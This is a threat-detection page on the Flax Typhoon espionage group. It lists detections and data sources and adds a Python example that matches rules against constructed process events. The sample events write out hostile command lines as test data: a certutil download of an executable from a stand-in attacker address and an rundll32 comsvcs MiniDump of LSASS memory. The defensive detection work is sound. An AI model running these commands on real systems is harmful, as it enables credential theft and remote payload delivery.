Analytics Story: Flax Typhoon

Description

Microsoft has identified Flax Typhoon, a nation-state activity group based in China, targeting Taiwanese organizations for espionage. The group gains and keeps long-term access to victim networks with minimal use of malware, relying instead on built-in operating system tools and otherwise benign software. Its activity is concentrated on Taiwan, but the techniques transfer readily to operations outside the region. Microsoft has not observed Flax Typhoon using this access to conduct additional actions beyond maintaining it, harvesting credentials and scanning for further targets.

Why it matters

Flax Typhoon has been active since mid-2021, targeting government agencies, education, critical manufacturing and IT organizations in Taiwan. Its known toolset includes the China Chopper web shell, Metasploit, the Juicy Potato privilege escalation tool, Mimikatz and the SoftEther VPN client, but the group relies mainly on living-off-the-land techniques and hands-on-keyboard activity. Initial access comes from exploiting known vulnerabilities in public-facing servers and deploying web shells. From there, Flax Typhoon uses command-line tools to establish persistent access over Remote Desktop Protocol (RDP), set up a VPN connection to actor-controlled network infrastructure, and collect credentials from compromised systems. The same VPN access is then used to scan for vulnerabilities across the targeted organization from the compromised hosts. Because almost every step runs through built-in binaries (certutil, rundll32, service creation, accessibility binaries) rather than custom malware, detection depends on process, service and script-block telemetry rather than file signatures.

Detections

Name | Technique | Type
Windows Mimikatz Binary Execution | OS Credential Dumping | TTP
Windows File Download Via CertUtil | Ingress Tool Transfer | TTP
Web or Application Server Spawning a Shell | External Remote Services, Exploit Public-Facing Application | TTP
Windows SQL Spawning CertUtil | Ingress Tool Transfer | TTP
Windows Suspicious Child Process Spawned From WebServer | Web Shell | Anomaly
Windows Service Created with Suspicious Service Name | Service Execution | Anomaly
Windows Service Created with Suspicious Service Path | Service Execution | TTP
Dump LSASS via comsvcs DLL | LSASS Memory | TTP
Windows SoftEther VPN Masquerading as Legitimate Binary | Masquerading, Protocol Tunneling | TTP
Overwriting Accessibility Binaries | Accessibility Features | TTP
PowerShell 4104 Hunting | PowerShell | Hunting
BITSAdmin Download File | Ingress Tool Transfer, BITS Jobs | TTP
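Added example, written for this page and not part of Splunk's security content: a Python approximation of five of the detections listed above, run over constructed process-creation records (Sysmon EventID 1 / Security 4688 style) and service-install records (System 7045 style). The rule names match the table, but the matching logic, the web-server and shell name sets, the SoftEther OriginalFileName list, the user-writable path pattern and the sample events are assumptions of this example, not the exact search logic of the referenced detections.

```python
"""Rule-per-function approximation of several Flax Typhoon detections.

Added example for this page; not Splunk's search logic. Name sets and
sample events are constructed assumptions.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass
class ProcEvent:
    image: str                     # new process image path
    parent_image: str              # parent process image path
    command_line: str
    original_file_name: str = ""   # PE OriginalFileName, as Sysmon EventID 1 records it


def _base(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


# Assumed name sets; extend to the web servers and shells present in your estate.
WEB_SERVERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe", "php-cgi.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh.exe", "bash.exe"}
# Assumed OriginalFileName values carried by SoftEther VPN executables.
SOFTETHER_ORIGINALS = {"vpnserver.exe", "vpnbridge.exe", "vpnclient.exe", "vpncmd.exe"}
# Assumed set of directories an unprivileged user can write to.
USER_WRITABLE = re.compile(r"\\(users|programdata|temp|tmp|appdata|perflogs|public)\\", re.I)


def web_server_spawning_shell(ev: ProcEvent) -> bool:
    """A web server process starting an interactive shell is the classic web-shell tell."""
    return _base(ev.parent_image) in WEB_SERVERS and _base(ev.image) in SHELLS


def certutil_download(ev: ProcEvent) -> bool:
    """certutil -urlcache ... http(s)://... pulls a remote file onto disk."""
    cl = ev.command_line.lower()
    return _base(ev.image) == "certutil.exe" and "urlcache" in cl and ("http://" in cl or "https://" in cl)


def lsass_dump_via_comsvcs(ev: ProcEvent) -> bool:
    """rundll32 comsvcs.dll MiniDump <pid> writes a full memory dump of a process (LSASS)."""
    cl = ev.command_line.lower()
    return _base(ev.image) == "rundll32.exe" and "comsvcs" in cl and "minidump" in cl


def softether_masquerading(ev: ProcEvent) -> bool:
    """A renamed binary keeps its PE OriginalFileName; flag SoftEther running under another name."""
    orig = ev.original_file_name.lower()
    return orig in SOFTETHER_ORIGINALS and _base(ev.image) != orig


def suspicious_service_path(image_path: str) -> bool:
    """System 7045 ImagePath pointing into a user-writable directory."""
    return bool(USER_WRITABLE.search(image_path))


PROC_RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    "Web or Application Server Spawning a Shell": web_server_spawning_shell,
    "Windows File Download Via CertUtil": certutil_download,
    "Dump LSASS via comsvcs DLL": lsass_dump_via_comsvcs,
    "Windows SoftEther VPN Masquerading as Legitimate Binary": softether_masquerading,
}


def run_proc_rules(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in PROC_RULES.items() if rule(ev)]


def run_service_rules(services: List[Tuple[str, str]]) -> List[str]:
    """Return service names whose ImagePath is in a user-writable location."""
    return [name for name, path in services if suspicious_service_path(path)]


# Constructed sample telemetry (not real events); 198.51.100.7 is a documentation address.
SAMPLE_PROCS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\inetsrv\w3wp.exe", "cmd.exe /c whoami"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              r"certutil.exe -urlcache -split -f http://198.51.100.7/a.exe C:\Windows\Temp\a.exe", "CertUtil.exe"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\cmd.exe",
              r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Temp\l.dmp full"),
    ProcEvent(r"C:\ProgramData\conhost.exe", r"C:\Windows\System32\services.exe",
              r"C:\ProgramData\conhost.exe /start", "vpnbridge.exe"),
    ProcEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
    # ASP.NET compiling a page: a web-server child, but not a shell, so it must not fire.
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", r"C:\Windows\System32\inetsrv\w3wp.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Windows\Temp\abc.cmdline"'),
]
SAMPLE_SERVICES = [
    ("UpdateSvc", r"C:\Users\Public\svc.exe"),
    ("wuauserv", r"C:\Windows\System32\svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for idx, rule in run_proc_rules(SAMPLE_PROCS):
        print(f"[{rule}] {SAMPLE_PROCS[idx].command_line}")
    for svc in run_service_rules(SAMPLE_SERVICES):
        print(f"[Windows Service Created with Suspicious Service Path] {svc}")
```

The SoftEther rule shows why Sysmon's OriginalFileName field matters for masquerading detections: Flax Typhoon renaming the VPN binary changes the image path but not the PE header, so the comparison between the two is the whole detection. The csc.exe event is included deliberately; web servers spawn compilers and other helpers routinely, which is why the shell list is narrow rather than "any child of w3wp.exe".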

Data Sources

Name | Platform | Sourcetype | Source
Windows Event Log Security 4688 | Windows | XmlWinEventLog | XmlWinEventLog:Security
Sysmon EventID 1 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
CrowdStrike ProcessRollup2 | Other | crowdstrike:events:sensor | crowdstrike
Cisco Network Visibility Module Flow Data | Network | cisco:nvm:flowdata | not_applicable
Sysmon for Linux EventID 1 | Linux | sysmon:linux | Syslog:Linux-Sysmon/Operational
Windows Event Log System 7045 | Windows | XmlWinEventLog | XmlWinEventLog:System
Sysmon EventID 11 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Powershell Script Block Logging 4104 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-PowerShell/Operational

Source: GitHub | Version: 2